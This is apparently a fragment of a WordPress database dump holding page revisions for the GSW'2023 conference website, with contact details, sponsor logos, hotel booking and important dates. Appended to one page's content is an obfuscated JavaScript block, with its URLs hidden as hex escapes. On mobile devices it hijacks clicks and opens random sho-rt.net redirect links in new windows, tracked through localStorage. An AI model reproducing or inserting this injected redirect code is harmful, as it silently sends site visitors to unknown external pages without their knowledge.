color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:34:45','2023-05-18 02:34:45','',3066,'https://gsw2023.com/?p=4547',0,'revision','',0),
(4548,1,'2023-05-18 02:34:58','2023-05-18 02:34:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px 